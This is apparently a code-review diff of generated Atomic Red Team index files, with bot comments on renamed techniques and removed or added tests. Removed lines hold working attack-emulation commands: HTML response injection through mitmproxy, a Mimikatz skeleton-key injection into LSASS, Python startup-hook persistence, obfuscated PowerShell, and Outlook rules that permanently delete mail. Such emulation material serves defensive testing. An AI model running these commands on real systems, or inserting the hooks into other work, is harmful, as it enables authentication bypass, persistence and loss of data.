printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n if 'text/html' in flow.response.headers.get('content-type',''):\n flow.response.headers['X-Atomic']='T1659'\n flow.response.text = flow.response.text.replace('</body>', '<script>alert(\"Atomic T1659 Injection\")</script></body>')" > /tmp/atomic_t1659_inject.py
($HOME/.local/bin/mitmdump -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &)
sleep 5
lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1)
executor:
name: bash
command: |
curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
cleanup_command: |
rm -rf /tmp/atomic_t1659_inject.py
rm -rf /tmp/atomic_t1659.log
rm -rf /tmp/curl_out.txt
rm -rf /tmp/atomic_t1659_page.html
pkill -f mitmdump || true
atomic_tests: []
T1078.001:
technique:
type: attack-pattern
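Review bot: the T1659 entry comes back empty, and a likely converter trip-up is visible in the removed lines: the last dependency's `get_prereq_command` is a block scalar whose first line is a long single-line `printf` with escaped quotes and `\n` sequences, which a YAML round-trip that re-emits block scalars as flow scalars (as the other entries in this diff do) can easily mangle. Confirm the converter parses and re-emits that scalar before treating this as a deliberate removal; note that the test's cleanup (`pkill -f mitmdump`) and all five dependency checks go with it.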
+8 -18
View File
@@ -11651,7 +11651,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
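Review bot: `name` drops the parent-technique prefix ("Modify Authentication Process: ") and keeps only the sub-technique name. That matches the raw STIX object's `name`, but it changes a user-visible string while the `modified` timestamp above it stays the same; confirm the renderer rebuilds the "Parent: Sub-technique" form from the relationship data, otherwise listings will show a bare "Domain Controller Authentication" with no parent context. The same rename is applied below to Python Startup Hooks, Systemctl, Outlook Rules and Domain Generation Algorithms, so one decision covers all of them.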
@@ -11681,7 +11681,6 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -20244,7 +20243,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -20280,7 +20279,6 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -23178,7 +23176,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -23201,7 +23199,6 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests: []
T1059.009:
technique:
@@ -27386,7 +27383,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
@@ -27407,7 +27404,6 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests: []
T1098.007:
technique:
@@ -31730,7 +31726,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -31766,7 +31762,6 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -32252,7 +32247,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -32282,7 +32277,6 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -34104,7 +34098,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
@@ -34131,7 +34125,6 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests: []
T1071.004:
technique:
@@ -34533,7 +34526,6 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1205:
technique:
@@ -44573,7 +44565,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -44603,7 +44595,6 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -56317,7 +56308,6 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1078.001:
technique:
+8 -18
View File
@@ -11470,7 +11470,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
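Review bot: this file carries exactly the same edit set as the preceding one (`+8 -18`, the same five `name` rewrites and the same `identifier` removals on the same techniques), so these indexes are evidently generated from a single source. The `name` and `identifier` comments on the previous file apply here unchanged; rather than reviewing each generated copy, add a converter or CI check that the per-file indexes stay in sync.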
@@ -11500,7 +11500,6 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -20063,7 +20062,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -20099,7 +20098,6 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -22946,7 +22944,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -22969,7 +22967,6 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests: []
T1059.009:
technique:
@@ -27154,7 +27151,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
@@ -27175,7 +27172,6 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests: []
T1098.007:
technique:
@@ -31498,7 +31494,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -31534,7 +31530,6 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -32020,7 +32015,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -32050,7 +32045,6 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -33821,7 +33815,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
@@ -33848,7 +33842,6 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests: []
T1071.004:
technique:
@@ -34250,7 +34243,6 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1205:
technique:
@@ -44152,7 +44144,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -44182,7 +44174,6 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -55896,7 +55887,6 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1078.001:
technique:
+46 -1091
View File
@@ -1523,10 +1523,10 @@ defense-evasion:
$encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
$bytes = [System.Convert]::FromBase64String($encodedString)
$decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
#write the decoded eicar string to file
$decodedString | Out-File $env:temp\T1027.013_decodedEicar.txt
cleanup_command: Remove-Item $env:temp\T1027.013_decodedEicar.txt -Force -ErrorAction
Ignore
$decodedString | Out-File T1027.013_decodedEicar.txt
cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file.
name: powershell
elevation_required: false
- name: Decrypt Eicar File and Write to File
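Review bot: two regressions in the "Decode" test body: `cleanup_command` becomes the English sentence "Just delete the resulting T1027.013_decodedEicar.txt file.", which the PowerShell executor will try to run and fail on, and the `Out-File` target loses its `$env:temp\` prefix, so the decoded EICAR string is written to whatever the current working directory is. The replaced `Remove-Item $env:temp\T1027.013_decodedEicar.txt -Force -ErrorAction Ignore` should stay; if the converter is re-emitting an older revision of this test, its source is stale.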
@@ -1541,12 +1541,13 @@ defense-evasion:
command: |-
$encryptedString = "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"
$key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
$decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
$decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
#Write the decrypted eicar string to a file
$decryptedString | Out-File $env:temp\T1027.013_decryptedEicar.txt
cleanup_command: Remove-Item $env:temp\T1027.013_decryptedEicar.txt -Force
-ErrorAction Ignore
$decryptedString | out-file T1027.013_decryptedEicar.txt
cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file.
name: powershell
elevation_required: false
T1014:
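Review bot: same regression as the previous hunk: `out-file T1027.013_decryptedEicar.txt` drops the `$env:temp\` path and `cleanup_command` is again prose rather than a command. Because the decrypted content is the EICAR test string, leaving it in an arbitrary working directory will trip antivirus wherever the runner happens to be invoked; keep the `$env:temp` path and the `Remove-Item ... -Force -ErrorAction Ignore` cleanup.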
@@ -19687,22 +19688,6 @@ defense-evasion:
'
name: command_prompt
- name: Obfuscated PowerShell Command via Character Array
auto_generated_guid: 6683baf0-6e77-4f58-b114-814184ea8150
description: "Spawns a child PowerShell process using character array obfuscation.
\nBoth the PowerShell binary name and executed command are constructed \nfrom
ASCII values at runtime to evade string-based detection.\n"
supported_platforms:
- windows
executor:
command: |
$ps = [char[]](112,111,119,101,114,115,104,101,108,108)
$cmd = [char[]](83,116,97,114,116,45,80,114,111,99,101,115,115,32,99,97,108,99,46,101,120,101)
& (-join $ps) "-Command" (-join $cmd)
cleanup_command: |
taskkill /f /im calculator.exe >nul 2>nul
taskkill /f /im CalculatorApp.exe >nul 2>nul
name: powershell
T1556.006:
technique:
type: attack-pattern
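Review bot: the "Obfuscated PowerShell Command via Character Array" test (guid 6683baf0-...) is removed outright, cleanup included, with no replacement and no mention in the commit message. If the converter's source lacks this test, the removal is data loss rather than conversion; if it was retired deliberately (for example because the `taskkill` cleanup targets two different calculator process names), record that in the message.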
@@ -22925,7 +22910,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -22955,54 +22940,7 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests:
- name: Skeleton Key via Mimikatz
auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
description: |
Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
This test must be run on an isolated domain controller and must not be performed on a production DC.
Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
supported_platforms:
- windows
input_arguments:
mimikatz_path:
type: path
default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
description: Path to the mimikatz executable
file_path:
type: path
default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
description: File path where the zipped mimikatz file is downloaded to
mimikatz_url:
type: url
default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
description: The URL for the mimikatz release zip
directory_path:
type: path
default: C:\ExternalPayloads\Mimikatz
description: Directory path for mimikatz
dependency_executor_name: powershell
dependencies:
- description: Mimikatz must be present on the host machine at
prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
executor:
command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
'
cleanup_command: |
Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
Restart-Computer -Force
name: powershell
elevation_required: true
atomic_tests: []
T1027.006:
technique:
type: attack-pattern
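Review bot: the Skeleton Key test (guid 0ee8081f-...) disappears together with `identifier: T1556.001`, leaving `atomic_tests: []`. Its description insists on an isolated domain controller and its cleanup forces a reboot, so if this test is being pulled because it is too disruptive for the index, that decision belongs in the commit message; if not, it is another entry the converter has emptied, and the `input_arguments` block (four `#{...}` placeholders) is a plausible parsing trip-up to check.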
@@ -38074,7 +38012,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -38110,99 +38048,7 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests:
- name: Python Startup Hook - atomic_hook.pth (Windows)
auto_generated_guid: 57289962-21dc-4501-b756-80cd30608d9f
description: "Executes code by placing a .pth file in the site-packages directory.
\nSupports python.exe and python3.exe via input arguments.\n"
supported_platforms:
- windows
input_arguments:
python_exe:
description: The python binary name to test.
type: String
default: python.exe
dependency_executor_name: powershell
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
SilentlyContinue) { exit 0 } else { exit 1 }
'
get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
(e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
or ensure it is in your PATH."
'
executor:
name: powershell
elevation_required: false
command: |
$TempDir = Join-Path $env:TEMP "atomic_pth_win"
New-Item -ItemType Directory -Path $TempDir -Force
& "#{python_exe}" -m venv "$TempDir\env"
$SitePackages = & "$TempDir\env\Scripts\python.exe" -c "import site; print(site.getsitepackages()[1])"
"import os, subprocess; os.environ.get('CALC_SPAWNED') or (os.environ.update({'CALC_SPAWNED':'1'}) or subprocess.Popen(['calc.exe']))" | Out-File -Encoding ASCII "$SitePackages\atomic_hook.pth"
Get-ChildItem -Path "$SitePackages" | Where-Object { $_.Name -like "*.pth" }
& "$TempDir\env\Scripts\python.exe" -c "print('Triggering Hook via atomic_hook...')"
cleanup_command: |
if (-not (Get-ChildItem -Path $env:TEMP -ErrorAction SilentlyContinue | Where-Object Name -like 'atomic_pth_win')) { Write-Host "[!] Artifact missing: $env:Temp\atomic_pth_win Folder - [-] Please Run : Invoke-AtomicTest T1546.018"; exit 1 };
Remove-Item -Path "$env:TEMP\atomic_pth_win" -Recurse -Force
Write-Host "[+] Successfully Removed atomic_pth_win folder and atomic_hook.pth from Temp Directory"
Get-Process -Name "Calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
Get-Process -Name "calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
Write-Host "[+] Successfully Terminated Calculator"
- name: Python Startup Hook - usercustomize.py (Windows)
auto_generated_guid: 05cc7a2c-ce32-46f2-a358-f27f76718c39
description: "Executes code via usercustomize.py. This is a per-user persistence
mechanism \nthat does not require Administrative privileges.\n"
supported_platforms:
- windows
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python.exe
dependency_executor_name: powershell
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
SilentlyContinue) { exit 0 } else { exit 1 }
'
get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
(e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
or ensure it is in your PATH."
'
executor:
name: powershell
elevation_required: false
command: |
$UserDir = & "#{python_exe}" -c "import site; print(site.getusersitepackages())"
if (!(Test-Path $UserDir)) { New-Item -ItemType Directory -Path $UserDir -Force }
"import os; os.system('calc.exe')" | Out-File -FilePath "$UserDir\usercustomize.py" -Encoding ASCII
Get-ChildItem -Path "$UserDir"
& "#{python_exe}" -c "print('Triggering Hook via usercustomize...')"
cleanup_command: "$PyBin = if (Get-Command \"#{python_exe}\" -ErrorAction
SilentlyContinue) { \"#{python_exe}\" } elseif (Get-Command \"python3.exe\"
-ErrorAction SilentlyContinue) { \"python3.exe\" } else { \"python.exe\"
}; \n$UserDir = & $PyBin -S -c \"import site; print(site.getusersitepackages())\"\nif
(-not (Get-ChildItem -Path $UserDir -Recurse -ErrorAction SilentlyContinue
| Where-Object Name -like 'usercustomize*')) { Write-Host \"[!] Artifact
missing: $UserDir\\usercustomize.py - [-] Please Run : Invoke-AtomicTest
T1546.018\"; exit 1 };\nGet-ChildItem -Path \"$UserDir\" -Recurse -Force
|\nWhere-Object { $_.Name -like \"usercustomize*\" } |\nRemove-Item -Force
\nWrite-Host \"[+] Successfully Removed usercustomize.py under $UserDir\"\nGet-Process
-Name \"Calc*\", \"calc*\" -ErrorAction SilentlyContinue | Stop-Process
-Force\nWrite-Host \"[+] Successfully Terminated Calculator\"\n"
atomic_tests: []
T1037.003:
technique:
type: attack-pattern
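Review bot: both Windows T1546.018 tests (`atomic_hook.pth`, guid 57289962-..., and `usercustomize.py`, guid 05cc7a2c-...) are removed. The second test's `cleanup_command` is a double-quoted flow scalar wrapped across many lines with embedded `\n` and `\"` escapes, exactly the shape a naive YAML round-trip mangles; check whether the converter dropped the entry because it could not re-emit that scalar before concluding the tests were meant to go. Both tests also spawn `calc.exe` and rely on their cleanup to terminate it, so removing only the tests is safe, but removing them by accident is not.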
@@ -42968,7 +42814,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -42991,7 +42837,6 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests: []
T1059.009:
technique:
@@ -50073,6 +49918,20 @@ persistence:
3. Click 'Select'
name: manual
- name: Chrome/Chromium (Chrome Web Store)
auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
description: Install the "Minimum Viable Malicious Extension" Chrome extension
supported_platforms:
- linux
- windows
- macos
executor:
steps: |
1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend
in Chrome
2. Click 'Add to Chrome'
name: manual
- name: Firefox
auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938
description: 'Create a file called test.wma, with the duration of 30 seconds
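Review bot: this is the only addition among the removals in this file, a manual Chrome Web Store test (guid 4c83940d-...) whose two steps install an extension but whose entry has no `cleanup_command`, so the "Minimum Viable Malicious Extension" stays installed after the test. Add an uninstall step, and confirm the Web Store listing at that URL still resolves, since a manual test pointing at a dead listing cannot be executed.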
@@ -50183,7 +50042,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
@@ -50204,410 +50063,7 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests:
- name: Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object
auto_generated_guid: ffadc988-b682-4a68-bd7e-4803666be637
description: |
Creates a malicious Outlook rule via the COM object that permanently deletes
emails when an email with a specific subject keyword arrives. Simulates
adversary persistence via Outlook Rules (T1137.005). Uses DeletePermanently
action as it does not require a resolved Exchange folder unlike MoveToFolder.
NOTE: olRuleActionStartApplication cannot be created programmatically per
Microsoft's Rules object model - DeletePermanently is used as the supported
equivalent that generates the same rule-creation artefact.
NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
session. Outlook COM fails with 0x80080005 when invoked as Administrator.
supported_platforms:
- windows
input_arguments:
rule_name:
description: Name for the malicious Outlook rule
type: string
default: AtomicTest_T1137005_SubjectTrigger
trigger_subject:
description: Email subject keyword that triggers the rule
type: string
default: atomic-rt-trigger
dependencies:
- description: Classic Outlook must be installed (required for COM automation)
prereq_command: |
$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
if ($clsid) { exit 0 } else { exit 1 }
get_prereq_command: |
Write-Host "[-] Classic Outlook is not installed or COM is not registered."
Write-Host " Install Microsoft 365 Apps with Classic Outlook before running this test."
Write-Host " Note: The new Outlook for Windows does NOT support COM automation."
exit 1
executor:
name: powershell
elevation_required: false
command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] This test must be run from a non-elevated PowerShell session."
Write-Host " Outlook COM fails with 0x80080005 when run as Administrator."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$rules = $namespace.DefaultStore.GetRules()
$rule = $rules.Create("#{rule_name}", 0)
$cond = $rule.Conditions.Subject
$cond.Enabled = $true
$cond.Text = @("#{trigger_subject}")
$action = $rule.Actions.DeletePermanently
$action.Enabled = $true
$rule.Enabled = $true
$rules.Save()
Write-Host "[+] Rule '#{rule_name}' created. Emails with subject '#{trigger_subject}' will be permanently deleted."
cleanup_command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$rules = $namespace.DefaultStore.GetRules()
$removed = $false
for ($i = $rules.Count; $i -ge 1; $i--) {
if ($rules.Item($i).Name -eq "#{rule_name}") {
$rules.Remove($rules.Item($i).Name)
$removed = $true
}
}
if ($removed) {
$rules.Save()
Write-Host "[+] All instances of rule '#{rule_name}' removed."
} else {
Write-Host "[*] Rule '#{rule_name}' not found - already removed."
}
- name: Outlook Rule - Sender Address Trigger with DeletePermanently Action via
COM Object
auto_generated_guid: bddfd8d4-7687-4971-b611-50a537ab3ab4
description: |
Creates an Outlook rule via COM that permanently deletes emails received
from a specific sender address. Adversaries use sender-based triggers to
make rules appear more legitimate (e.g. disguised as a filter for a
specific colleague). Tests a different rule condition path through the
COM object model. Uses DeletePermanently as it does not require a resolved
Exchange folder unlike MoveToFolder.
NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
session. Outlook COM fails with 0x80080005 when invoked as Administrator.
supported_platforms:
- windows
input_arguments:
rule_name:
description: Name for the malicious Outlook rule
type: string
default: AtomicTest_T1137005_SenderTrigger
trigger_sender:
description: Sender email address that triggers the rule
type: string
default: atomictest@redteam.local
dependencies:
- description: Classic Outlook must be installed (required for COM automation)
prereq_command: |
$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
if ($clsid) { exit 0 } else { exit 1 }
get_prereq_command: |
Write-Host "[-] Classic Outlook is not installed or COM is not registered."
Write-Host " Install Microsoft 365 Apps with Classic Outlook before running this test."
